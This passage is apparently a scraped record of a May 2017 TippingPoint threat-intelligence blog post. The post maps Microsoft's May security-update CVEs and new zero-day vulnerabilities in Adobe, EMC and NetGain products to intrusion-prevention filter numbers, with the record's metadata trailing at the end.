response digest\n * 28221: HTTP: Microsoft Malware Protection Engine mpengine Type Confusion Vulnerability \n---|--- \n| \n \n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Microsoft updates released on or before May 9, 2017. Microsoft released patches for 55 new CVEs in Internet Explorer, Edge, Office, Windows, and .NET Framework. A total of 14 of these CVEs are rated Critical while the rest are rated Important in severity. The following table maps Digital Vaccine filters to the Microsoft updates. Filters marked with an (*) shipped prior to this DV package, providing zero-day protection for our customers. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [May 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/5/5/the-may-2017-security-update-review>):\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-0064 | | Insufficient Vendor Information \nCVE-2017-0077 | 28112 | \nCVE-2017-0171 | | Insufficient Vendor Information \nCVE-2017-0175 | 28183 | \nCVE-2017-0190 | | Insufficient Vendor Information \nCVE-2017-0212 | | Insufficient Vendor Information \nCVE-2017-0213 | 28184 | \nCVE-2017-0214 | 28189 | \nCVE-2017-0220 | 28198 | \nCVE-2017-0221 | 28114 | \nCVE-2017-0222 | | Insufficient Vendor Information \nCVE-2017-0224 | | Insufficient Vendor Information \nCVE-2017-0226 | | Insufficient Vendor Information \nCVE-2017-0227 | 28130 | \nCVE-2017-0228 | *27538 | \nCVE-2017-0229 | | Insufficient Vendor Information \nCVE-2017-0230 | | Insufficient Vendor Information \nCVE-2017-0231 | | Insufficient Vendor Information \nCVE-2017-0233 | | Insufficient Vendor Information \nCVE-2017-0234 | *27532 | \nCVE-2017-0235 | | Insufficient Vendor Information \nCVE-2017-0236 | *27536 | \nCVE-2017-0238 | *27540 | \nCVE-2017-0240 | *27541, *27542 | \nCVE-2017-0241 | | Insufficient Vendor Information \nCVE-2017-0242 | | Insufficient Vendor Information \nCVE-2017-0243 | 28192 | \nCVE-2017-0244 | | Insufficient Vendor Information \nCVE-2017-0245 | 28185 | \nCVE-2017-0246 | 28111 | \nCVE-2017-0248 | | Insufficient Vendor Information \nCVE-2017-0254 | | Insufficient Vendor Information \nCVE-2017-0255 | | Insufficient Vendor Information \nCVE-2017-0258 | 28199 | \nCVE-2017-0259 | 28200 | \nCVE-2017-0261 | | Insufficient Vendor Information \nCVE-2017-0262 | | Insufficient Vendor Information \nCVE-2017-0263 | 28186 | \nCVE-2017-0264 | | Insufficient Vendor Information \nCVE-2017-0265 | | Insufficient Vendor Information \nCVE-2017-0266 | 28193 | \nCVE-2017-0267 | | Insufficient Vendor Information \nCVE-2017-0268 | | Insufficient Vendor Information \nCVE-2017-0269 | | Insufficient Vendor Information \nCVE-2017-0270 | | Insufficient Vendor Information \nCVE-2017-0271 | | Insufficient Vendor Information \nCVE-2017-0272 | | Insufficient Vendor Information \nCVE-2017-0273 | | Insufficient Vendor Information \nCVE-2017-0274 | | Insufficient Vendor Information \nCVE-2017-0275 | | Insufficient Vendor Information \nCVE-2017-0276 | | Insufficient Vendor Information \nCVE-2017-0277 | | Insufficient Vendor Information \nCVE-2017-0278 | | Insufficient Vendor Information \nCVE-2017-0279 | | Insufficient Vendor Information \nCVE-2017-0280 | | Insufficient Vendor Information \nCVE-2017-0281 | | Insufficient Vendor Information \n \n \n\n**Zero-Day Filters**\n\nThere are 14 new zero-day filters covering three vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (5)_**\n\n| \n\n * 28094: ZDI-CAN-4564: Zero Day Initiative Vulnerability (Adobe Flash)\n * 28099: ZDI-CAN-4565: Zero Day Initiative Vulnerability (Adobe Flash)\n * 28100: ZDI-CAN-4566: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28101: ZDI-CAN-4567: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28202: ZDI-CAN-4715, 4716: Zero Day Initiative Vulnerability (Adobe Reader DC)**_ _** \n---|--- \n| \n \n**_EMC (6)_**\n\n| \n\n * 28102: ZDI-CAN-4694: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28103: ZDI-CAN-4695: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28104: ZDI-CAN-4696: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28105: ZDI-CAN-4698: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28106: ZDI-CAN-4699: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28107: ZDI-CAN-4710: Zero Day Initiative Vulnerability (EMC AppSync)**_ _** \n---|--- \n| \n \n**_NetGain (3)_**\n\n| \n\n * 28108: ZDI-CAN-4749: Zero Day Initiative Vulnerability (NetGain Enterprise Manager)\n * 28109: ZDI-CAN-4750: Zero Day Initiative Vulnerability (NetGain Enterprise Manager)\n * 28110: ZDI-CAN-4751: Zero Day Initiative Vulnerability (NetGain Enterprise Manager)**_ _** \n---|--- \n| \n \n**Updated Existing Zero-Day Filters**\n\nThis section highlights specific filter(s) of interest in this week\u2019s Digital Vaccine package that have been updated as a result of a vendor either issuing a patch for a vulnerability found via the Zero Day Initiative or a vulnerability that has been published by the Zero Day Initiative in accordance with its [Disclosure Policy](<http://zerodayinitiative.com/advisories/disclosure_policy/>).\n\nThree of the filters we have for this month\u2019s Microsoft bulletins are a direct result of the Zero Day Initiative\u2019s Pwn2Own contest held in March. These filters have been updated to reflect the fact that the vulnerabilities have been patched:\n\n| \n\n * 27532: HTTP: Microsoft Edge Chakra JIT Array Memory Corruption Vulnerability (Pwn2Own)\n * 27538: HTTP: Microsoft Edge Chakra Array Splice Use-After-Free Vulnerability (Pwn2Own)\n * 27540: HTTP: Microsoft Edge Chakra Array Unshift Buffer Overflow Vulnerability (Pwn2Own)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-may-1-2017/>).", "cvss3": {}, "published": "2017-05-12T16:47:57", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of May 8, 2017", "type": "trendmicroblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0244", "CVE-2017-0229", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0290", "CVE-2017-0248", "CVE-2017-5689", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0235", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0230", "CVE-2017-0220", "CVE-2017-0224", "CVE-2017-0281", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0266", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0254", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0264", "CVE-2017-0077", "CVE-2017-0255", "CVE-2017-0221", "CVE-2017-0243", "CVE-2017-0277", "CVE-2017-0245", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0242", "CVE-2017-0262", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0265", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246", "CVE-2017-0261", "CVE-2017-0175"], "modified": "2017-05-12T16:47:57", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-may-8-2017/", "id": "TRENDMICROBLOG:278CA36BE7BE1D87941A99D03E2C3D5B", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}